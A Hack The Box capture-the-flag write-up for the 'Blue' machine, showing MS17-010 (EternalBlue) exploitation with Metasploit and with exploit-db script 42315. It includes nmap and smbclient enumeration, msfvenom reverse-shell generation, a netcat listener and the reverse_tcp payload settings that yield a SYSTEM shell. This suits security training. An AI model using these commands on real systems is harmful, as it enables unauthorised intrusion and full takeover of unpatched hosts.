Hack The Box — Blue
Information
Blue is an easy retired machine on Hack The Box by ch4p. The vulnerability on this machine is MS17–010 also known as ‘Eternal Blue’. We exploited this machine first with a Metasploit module and then with a python exploit. This writeup will not include any passwords/cracked hashes/flags.
Scanning
We will start off by running an NMAP scan against the target IP:
nmap -p- -sV -oN blue-scan 10.10.10.40From the results we can see that ports 139 and 445 are open. We will move on to investigating SMB.
Investigating SMB
We will connect to SMB using smbclient and see what is available:
smbclient -L 10.10.10.40
We can see two disk shares called ‘Share’ and one called ‘Users’, we will look at both of these:
smbclient \\\\10.10.10.40\\Share
There is nothing in ‘Share’ so let’s try ‘Users’:
smbclient \\\\10.10.10.40\\Users
We have access to a file-share but nothing really interesting. Given the Windows version our scan picked up, we will check to see if the server is vulnerable to eternal blue:
nmap -p 139,445 --script smb-vuln-ms17-010 10.10.10.40
We can see that the host is vulnerable. We will investigate ways to exploit this vulnerability.
Exploiting SMB using Metasploit
We will start msfconsole:
msfconsole -qAnd search for MS17–010:
search ms17-010
From the results we want to load the second exploit:
use 2Now we can look at the options:
options
We will set RHOST to our targets IP:
set RHOST 10.10.10.40
We will also set our payload:
set payload windows/x64/meterpreter/reverse_tcpWe will need to set our listener IP:
set LHOST 10.10.14.7And before we run the exploit let’s use check to make sure the target is vulnerable:
check
Now we are ready we will run the exploit:
runThe exploit completes and we get a Meterpreter session:
We use the ‘shell’ command to drop into a shell and we can see that we are nt/authority system:
shell
From here, we can get the user.txt and root.txt files.
Next, we will look at how to exploit this using a publicly available version of Eternal Blue.
Exploiting SMB — Python Script
We will use searchsploit to find an exploit:
searchsploit MS17-010
We find a list of exploits with one matching the Windows version on our target. We will save it to our local directory:
searchsploit -m 42315Looking at the exploit we are required to meet a few conditions and make a few adjustments. We will need to download mysmb.py, this module is imported by the exploit. We also need to adjust the payload to one that meets our needs and finally we need to add credentials, we don’t have a password but we can use the ‘guest’ login account which is enabled on the service.
We have mysmb.py in our local directory already but if needed we could download it and rename it with the following commands:
wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.pymv 42315.py.1 mysmb.py
Next, we will generate a reverse shell executable using MSFvenom:
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.7 LPORT=4444 > eternal-blue.exe
Now we have the reverse shell executable in our working directory we need to modify the path of the exploit in the python script. The original script looks like this:
We need to uncomment lines 922 and 923 and adjust the details to the following:
This will call to our executable payload on our attack machine and execute it once it is present on the victim.
Finally, we need to adjust the login details, we need to change the following to include, at least, a valid user. We know ‘guest’ is valid so we will use that in our adjusted script:
Next, we will setup our listener:
nc -lvnp 4444And finally run the exploit against the target:
python 42315.py 10.10.10.40The exploit runs:
And we can see we have a reverse shell connection to our listener as nt authority\system:
From here we can collect the proof flags and as before.
